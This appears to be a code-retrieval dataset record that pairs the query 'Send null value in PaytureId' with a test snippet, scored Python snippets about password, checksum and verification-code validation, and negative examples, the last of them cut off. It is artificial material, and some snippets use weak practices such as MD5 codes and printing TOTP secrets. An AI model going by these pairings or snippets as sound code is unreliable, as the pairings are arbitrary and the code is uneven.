[ "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def __len__(self):\n return len(self.code)", "def is_private(code):\n return 4000 <= code <= 4999", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def checksum(code):\n return sum(code) % 256", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def is_reserved(code):\n return 1000 <= code <= 2999", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def __len__(self):\n return self.cli.passwords.len()", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def SecondPart():\n return passwordChecker(data)", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def strlen(val): \n return len(val)", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def checkdigit(code):\n check = sum((i+1)*int(code[i]) for i in range(9)) % 11\n return 'X' if check == 10 else str(check)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def len12(self, len): # -> None:\n ...", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def clean_code(code, lengte):\n return code.zfill(lengte)", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def bit_length(self, ???):", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def validate(number):\n number = compact(number)\n if len(number) != 9:\n raise InvalidLength()\n if not isdigits(number[2:]):\n raise InvalidFormat()\n if not isdigits(number[:2]) and not all(x in 'ABCEHKMOPT' for x in number[:2]):\n raise InvalidFormat()\n if number[0] not in '1234567ABCEHKM':\n raise InvalidComponent()\n if number[-1] != calc_check_digit(number):\n raise InvalidChecksum()\n return number", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def generate_verification_code(self, size=10, chars=string.digits):\n return \"\".join(random.choice(chars) for _ in range(size))", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)" ]
[ "0.6516901", "0.6493827", "0.6453173", "0.63646185", "0.63212717", "0.6252427", "0.62409246", "0.6239357", "0.6138511", "0.61252916", "0.6071785", "0.6037417", "0.597209", "0.5948118", "0.5946584", "0.5912807", "0.59077805", "0.5901145", "0.58799016", "0.5859251", "0.58228135", "0.5796874", "0.57880145", "0.5764512", "0.57466596", "0.5727456", "0.5694502", "0.5687302", "0.5681753", "0.5679756", "0.567412", "0.5657683", "0.5650892", "0.5649115", "0.56466", "0.5644119", "0.56336683", "0.56030476", "0.5593121", "0.5551763", "0.5539865", "0.5537167", "0.55350655", "0.5534674", "0.5533335", "0.5524995", "0.55240136", "0.552254", "0.552254", "0.5518472", "0.5515472", "0.55111945", "0.5498758", "0.5486761", "0.5481363", "0.54778147", "0.54768264", "0.547063", "0.54677707", "0.5465291", "0.5459719", "0.54557514", "0.5452458", "0.5448294", "0.5421338", "0.54147524", "0.5393928", "0.53919375", "0.5381301", "0.5379857", "0.5377943", "0.53687775", "0.53634316", "0.5355129", "0.53483015", "0.5345736", "0.53444326", "0.5341786", "0.5338288", "0.5332644", "0.53242177", "0.53231364", "0.53231364", "0.5322299", "0.5321128", "0.53188056", "0.5315349", "0.53150904", "0.5312802", "0.5310756", "0.530724", "0.53068453", "0.53065306", "0.5305956", "0.5295103", "0.5291291", "0.5283861", "0.52706975", "0.5269231", "0.52675354", "0.52640164" ]
0.0
-1
Send null value in PaytureId
def test_41(self): assert 'False' == Api.requestBlock('test-41')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_missing_id(self, data, **kwargs):\n if not data.get(\"project_id\"):\n data[\"project_id\"] = lambda: uuid.uuid4().hex\n\n return data", "def payment_id_leading(self) -> bool:", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def no_payment_required(self):", "def uuid(self, value):\n if value is not None:\n self.keystore['id'] = value\n elif 'id' in self.keystore:\n self.keystore.pop('id')", "def test_add_none_field(self):\n user_id = get_rand_string()\n data = get_rand_string()\n id = get_rand_string()\n\n doc = {}\n doc[\"user_id\"] = user_id\n doc[\"data\"] = data\n doc[\"id\"] = id\n doc[\"num\"] = None\n\n self.conn.add(**doc)", "def test_post_cve_id_empty_amount(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers,\n params={\n 'amount': '',\n 'batch_type': 'sequential',\n 'cve_year': f'{utils.CURRENT_YEAR}',\n 'short_name': 'mitre'\n }\n )\n assert res.status_code == 400\n response_contains_json(res, 'error', 'BAD_INPUT')", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def test_post_cve_id_empty_params(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers,\n params={\n 'amount': '',\n 'batch_type': '',\n 'cve_year': '',\n 'short_name': ''\n }\n )\n # NOTE: there isn't a `short_name` error here, why?\n assert res.status_code == 400\n response_contains(res, 'amount')\n response_contains(res, 'cve_year')", "def getid_saveifneeded(self):\n #if (not hasattr(self,'id') or self.id == None):\n if (self.id == None):\n self.save()\n return self.id", "def __init__(self,\r\n id=None,\r\n person_id=None,\r\n personality_type=None,\r\n insurance_centre_type=None,\r\n register_status=None,\r\n center_name=None,\r\n center_code=None,\r\n registration_number=None,\r\n free_use_golden_pack_expire_date=None,\r\n city_id=None,\r\n cash_payment=None,\r\n show_in_easy_bimeh=None,\r\n installments_payment=None,\r\n is_initial_applicant=None,\r\n branchs_count=None,\r\n employees_count=None,\r\n white_label=None,\r\n phone=None,\r\n fax=None,\r\n address=None,\r\n zip_code=None,\r\n email=None,\r\n web_site=None,\r\n latitude=None,\r\n longitude=None,\r\n is_active=None,\r\n province_id=None,\r\n city_name=None,\r\n meta_media_activity_licence_id=None,\r\n create_on_persian_date=None,\r\n insurance_company_id=None,\r\n active_package_id=None,\r\n package_activation_last_date=None,\r\n online_payment=None,\r\n card_to_card_payment=None,\r\n bank_transfer_payment=None,\r\n cash_on_delivery=None,\r\n bank_transfer_same_online_payment_info=None,\r\n bank_param_id=None,\r\n account_owner=None,\r\n account_number=None,\r\n iban=None,\r\n card_bank_param_id=None,\r\n card_account_owner=None,\r\n card_account_number=None,\r\n bank_transfer_param_id=None,\r\n bank_transfer_account_owner=None,\r\n bank_transfer_account_number=None,\r\n bank_transfer_iban=None,\r\n branch_count=None,\r\n zone_id=None,\r\n sms_charging_stock=None,\r\n independent_branch=None,\r\n disable_reason=None,\r\n terms_conditions=None,\r\n disable_reason_description=None,\r\n unlimited_account=None,\r\n payment_url=None,\r\n callback_url=None,\r\n callback_url_whitelabel=None,\r\n insurance_centre_id=None,\r\n city_region_id=None,\r\n meta_media_activity_licence_url=None,\r\n license_api_key=None,\r\n verify_request_url=None):\r\n\r\n # Initialize members of the class\r\n self.id = id\r\n self.person_id = person_id\r\n self.personality_type = personality_type\r\n self.insurance_centre_type = insurance_centre_type\r\n self.register_status = register_status\r\n self.center_name = center_name\r\n self.center_code = center_code\r\n self.branch_count = branch_count\r\n self.registration_number = registration_number\r\n self.free_use_golden_pack_expire_date = free_use_golden_pack_expire_date\r\n self.city_id = city_id\r\n self.cash_payment = cash_payment\r\n self.show_in_easy_bimeh = show_in_easy_bimeh\r\n self.installments_payment = installments_payment\r\n self.is_initial_applicant = is_initial_applicant\r\n self.branchs_count = branchs_count\r\n self.employees_count = employees_count\r\n self.zone_id = zone_id\r\n self.sms_charging_stock = sms_charging_stock\r\n self.independent_branch = independent_branch\r\n self.disable_reason = disable_reason\r\n self.terms_conditions = terms_conditions\r\n self.disable_reason_description = disable_reason_description\r\n self.unlimited_account = unlimited_account\r\n self.white_label = white_label\r\n self.phone = phone\r\n self.fax = fax\r\n self.address = address\r\n self.zip_code = zip_code\r\n self.email = email\r\n self.payment_url = payment_url\r\n self.callback_url = callback_url\r\n self.callback_url_whitelabel = callback_url_whitelabel\r\n self.web_site = web_site\r\n self.latitude = latitude\r\n self.longitude = longitude\r\n self.is_active = is_active\r\n self.insurance_centre_id = insurance_centre_id\r\n self.city_region_id = city_region_id\r\n self.province_id = province_id\r\n self.city_name = city_name\r\n self.meta_media_activity_licence_id = meta_media_activity_licence_id\r\n self.meta_media_activity_licence_url = meta_media_activity_licence_url\r\n self.create_on_persian_date = create_on_persian_date\r\n self.insurance_company_id = insurance_company_id\r\n self.active_package_id = active_package_id\r\n self.package_activation_last_date = package_activation_last_date\r\n self.license_api_key = license_api_key\r\n self.verify_request_url = verify_request_url\r\n self.online_payment = online_payment\r\n self.card_to_card_payment = card_to_card_payment\r\n self.bank_transfer_payment = bank_transfer_payment\r\n self.cash_on_delivery = cash_on_delivery\r\n self.bank_transfer_same_online_payment_info = bank_transfer_same_online_payment_info\r\n self.bank_param_id = bank_param_id\r\n self.account_owner = account_owner\r\n self.account_number = account_number\r\n self.iban = iban\r\n self.card_bank_param_id = card_bank_param_id\r\n self.card_account_owner = card_account_owner\r\n self.card_account_number = card_account_number\r\n self.bank_transfer_param_id = bank_transfer_param_id\r\n self.bank_transfer_account_owner = bank_transfer_account_owner\r\n self.bank_transfer_account_number = bank_transfer_account_number\r\n 